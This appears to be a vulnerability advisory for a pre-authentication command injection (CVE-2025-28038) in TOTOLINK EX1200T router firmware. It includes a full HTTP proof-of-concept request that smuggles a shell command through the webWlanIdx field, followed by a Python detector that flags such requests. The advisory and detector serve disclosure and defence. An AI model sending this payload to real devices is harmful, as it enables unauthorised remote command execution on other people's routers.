wireless.so-setWebWlanIdx-webWlanIdx

[CVE-ID]

CVE-2025-28038

[PRODUCT]

TOTOLINK

[Vendor of Product]

https://www.totolink.net/

[VERSION]

EX1200T V4.1.2cu.5232_B20210713

[Firmware]

https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/148/ids/36.html

[Vulnerability Type]

RCE

[Description]

The TOTOLINK EX1200T V4.1.2cu.5232_B20210713 was found to contain a pre-authentication remote command execution vulnerability in the setWebWlanIdx function of wireless.so, reachable through the webWlanIdx parameter.


[POC]

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8
If-Modified-Since: Thu, 01 Jan 1970 00:00:03 GMT
Connection: close
Content-Length: 67

{"topicurl":"setting/setWebWlanIdx",
"webWlanIdx":"\\nls>/test1\\n"}

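As an added defender-side example (not part of this advisory), the following Python classifies JSON bodies sent to /cgi-bin/cstecgi.cgi and flags setWebWlanIdx calls whose webWlanIdx is anything other than a plain numeric index. It assumes a valid index is a small non-negative integer, which the advisory does not state, and that request bodies are available from a reverse proxy or WAF log in front of the device's web interface.

```python
import json
import re

# Assumption (not stated in the advisory): a legitimate WLAN index is a small
# non-negative integer, so anything else in webWlanIdx is worth an alert.
SAFE_INDEX = re.compile(r"^[0-9]{1,2}$")
TARGET_TOPIC = "setting/setWebWlanIdx"

# Constructed sample bodies: a benign call and the PoC body from this advisory.
SAMPLE_BODIES = [
    r'{"topicurl":"setting/setWebWlanIdx","webWlanIdx":"0"}',
    r'{"topicurl":"setting/setWebWlanIdx","webWlanIdx":"\\nls>/test1\\n"}',
]


def inspect_cstecgi_body(body: str) -> dict:
    """Classify one JSON body sent to /cgi-bin/cstecgi.cgi.

    verdict is one of: 'malformed' (not JSON), 'ignored' (another topicurl),
    'benign' (plain index) or 'suspicious' (webWlanIdx carries non-index data).
    """
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return {"verdict": "malformed", "reason": "body is not valid JSON"}
    if not isinstance(data, dict) or data.get("topicurl") != TARGET_TOPIC:
        return {"verdict": "ignored", "reason": "not a setWebWlanIdx call"}
    idx = data.get("webWlanIdx")
    # Accept a bare JSON number in range as well as a digit-only string.
    if isinstance(idx, int) and not isinstance(idx, bool) and 0 <= idx <= 99:
        return {"verdict": "benign", "reason": "numeric index"}
    if isinstance(idx, str) and SAFE_INDEX.match(idx):
        return {"verdict": "benign", "reason": "digit-only index"}
    # Report the raw value via repr() so control characters are escaped in logs.
    return {"verdict": "suspicious",
            "reason": "webWlanIdx is not a plain index: %r" % (idx,)}


def find_suspicious(bodies):
    """Return (body, finding) pairs for every body that is malformed or suspicious."""
    hits = []
    for body in bodies:
        finding = inspect_cstecgi_body(body)
        if finding["verdict"] in ("suspicious", "malformed"):
            hits.append((body, finding))
    return hits


if __name__ == "__main__":
    for body, finding in find_suspicious(SAMPLE_BODIES):
        print(finding["verdict"], "-", finding["reason"])
```

The same digit-only check is also the input validation the handler itself should apply before the value reaches any command string.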